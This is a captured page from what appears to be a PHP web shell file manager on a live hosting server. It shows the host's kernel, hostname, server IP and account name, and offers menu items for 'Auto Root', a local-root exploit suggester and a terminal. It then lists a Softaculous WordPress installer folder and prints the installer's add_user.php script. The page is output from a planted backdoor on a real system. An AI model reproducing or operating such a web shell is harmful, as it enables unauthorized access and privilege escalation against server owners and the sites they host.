Linux host2.healingcodesinfo.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Apache
Server IP : 69.167.168.125 & Your IP : 216.73.216.208
Domains : 126 Domain
User : christia
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
wp68 /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-03-11 15:03
languages
[ DIR ]
drwxr-xr-x
2026-03-11 15:03
php53
[ DIR ]
drwxr-xr-x
2026-03-11 15:03
php56
[ DIR ]
drwxr-xr-x
2026-03-11 15:03
php71
[ DIR ]
drwxr-xr-x
2026-03-11 15:03
php81
[ DIR ]
drwxr-xr-x
2026-03-11 15:03
php82
[ DIR ]
drwxr-xr-x
2026-03-11 15:03
plugins
[ DIR ]
drwxr-xr-x
2026-03-11 15:03
.htaccess
482
B
-rw-r--r--
2025-12-03 06:24
_htaccess
553
B
-rw-r--r--
2025-12-03 06:24
_index.php
59
B
-rw-r--r--
2025-12-03 06:24
_wp-config.php
3.39
KB
-rw-r--r--
2025-12-03 06:24
add_user.php
461
B
-rw-r--r--
2025-12-03 06:24
backup.php
3.04
KB
-rw-r--r--
2026-03-11 12:27
check_charset.php
2.02
KB
-rw-r--r--
2025-12-03 06:24
clone.php
32.26
KB
-rw-r--r--
2026-03-11 12:27
clone.xml
497
B
-rw-r--r--
2025-12-03 06:24
edit.php
9.88
KB
-rw-r--r--
2026-03-11 12:27
edit.xml
1.98
KB
-rw-r--r--
2025-12-03 06:24
extend.php
101.41
KB
-rw-r--r--
2026-03-11 12:27
fileindex.php
291
B
-rw-r--r--
2025-12-03 06:24
import.php
6.52
KB
-rw-r--r--
2026-03-11 12:27
info.xml
15.53
KB
-rw-r--r--
2026-03-11 11:48
install.js
4.2
KB
-rw-r--r--
2025-12-03 06:24
install.php
32.45
KB
-rw-r--r--
2026-03-11 12:27
install.xml
10.41
KB
-rw-r--r--
2025-12-03 06:24
md5
4.68
KB
-rw-r--r--
2026-03-11 12:27
notes.txt
6.33
KB
-rw-r--r--
2026-03-11 11:48
plugin_activate.php
596
B
-rw-r--r--
2025-12-03 06:24
plugin_deactivate.php
613
B
-rw-r--r--
2025-12-03 06:24
sign_on.php
3.28
KB
-rw-r--r--
2025-12-03 06:24
soft.htaccess
127
B
-rw-r--r--
2025-12-03 06:24
update_pass.php
602
B
-rw-r--r--
2025-12-03 06:24
upgrade.php
14.72
KB
-rw-r--r--
2026-03-11 12:27
upgrade.xml
1.83
KB
-rw-r--r--
2025-12-03 06:24
wp-config.php
3.11
KB
-rw-r--r--
2025-12-03 06:24
Save
Rename
<?php @unlink(__FILE__); // Validate if the request is from Softaculous if($_REQUEST['pass'] != '[[autopass]]'){ die("Unauthorized Access"); } require_once('wp-blog-header.php'); $user_data = '[[user_data]]'; $user_data = unserialize($user_data); $add = wp_insert_user($user_data); $ret = array(); if(is_wp_error($add)){ $ret['error'] = $add->get_error_messages(); }else{ $ret['done'] = 1; } echo '<add_user>'.serialize($ret).'</add_user>'; exit(0);